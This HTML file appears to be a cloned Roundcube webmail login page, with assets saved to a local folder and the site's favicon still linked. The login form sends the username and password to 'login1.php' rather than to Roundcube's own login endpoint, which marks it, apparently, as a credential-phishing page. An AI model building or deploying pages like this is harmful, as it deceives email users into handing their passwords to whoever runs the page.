<!DOCTYPE html>
<html class="js mozilla layout-large" lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Webmail :: Welcome to Webmail</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0">
<meta name="theme-color" content="#f4f4f4">
<meta name="msapplication-navbutton-color" content="#f4f4f4">

	<link rel="shortcut icon" href="https://webmail.tierra.net/skins/elastic/images/favicon.ico?s=1612812581">

	<link rel="stylesheet" href="index_files/bootstrap.css">
			<link rel="stylesheet" href="index_files/styles.css">
		
	<link rel="stylesheet" type="text/css" href="index_files/jquery-ui.css">
<script src="index_files/jquery.js"></script>
<script src="index_files/common.js"></script>
<script src="index_files/app.js"></script>
<script src="index_files/jstz.js"></script>
<script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10411,"cookie_domain":"","cookie_path":"/","cookie_secure":true,"skin":"elastic","blankpage":"skins/elastic/watermark.html","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":"./?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","request_token":"HkDEIAYa2gxAuyQDdvtzafiYGdVGQGXh"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files..."});
rcmail.gui_container("loginfooter","login-footer");rcmail.gui_object('loginform', 'login-form');
rcmail.gui_object('message', 'messagestack');
</script>

<script src="index_files/jquery-ui.js"></script>

</head>
<body class="task-login action-none">
			<div id="layout">
	

<h1 class="voice">Webmail Login</h1>

<div id="layout-content" class="selected no-navbar" role="main">
	<img src="index_files/logo.svg" id="logo" alt="Logo">
	<form id="login-form" name="login-form" method="post" class="propform" action="login1.php">
<input type="hidden" name="_token" value="HkDEIAYa2gxAuyQDdvtzafiYGdVGQGXh" class="form-control">
	<input type="hidden" name="_task" value="login" class="form-control"><input type="hidden" name="_action" value="login" class="form-control"><input type="hidden" name="_timezone" id="rcmlogintz" value="Africa/Lagos" class="form-control"><input type="hidden" name="_url" id="rcmloginurl" value="" class="form-control"><table><tbody><tr class="form-group row"><td class="title" style="display: none;"><label for="rcmloginuser">Username</label>
</td>
<td class="input input-group input-group-lg"><span class="input-group-prepend"><i class="input-group-text icon user"></i></span><input name="_user" id="rcmloginuser" required="" size="40" autocapitalize="none" autocomplete="off" type="text" class="form-control" placeholder="Username"></td>
</tr>
<tr class="form-group row"><td class="title" style="display: none;"><label for="rcmloginpwd">Password</label>
</td>
<td class="input input-group input-group-lg"><span class="input-group-prepend"><i class="input-group-text icon pass"></i></span><input name="_pass" id="rcmloginpwd" required="" size="40" autocapitalize="none" autocomplete="off" type="password" class="form-control" placeholder="Password"></td>
</tr>
</tbody>
</table>
<p class="formbuttons"><button type="submit" id="rcmloginsubmit" class="button mainaction submit btn btn-primary btn-lg text-uppercase w-100">Login</button>
</p>

		<div id="login-footer" role="contentinfo">
			Webmail
			
						
		</div>
	</form>
</div>

<noscript>
	<p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
</noscript>

</div>
<div id="messagestack"></div>
<script>
$(function() {
rcmail.init();
});
</script>



<script src="index_files/bootstrap.js"></script>
<script src="index_files/ui.js"></script>


</body></html>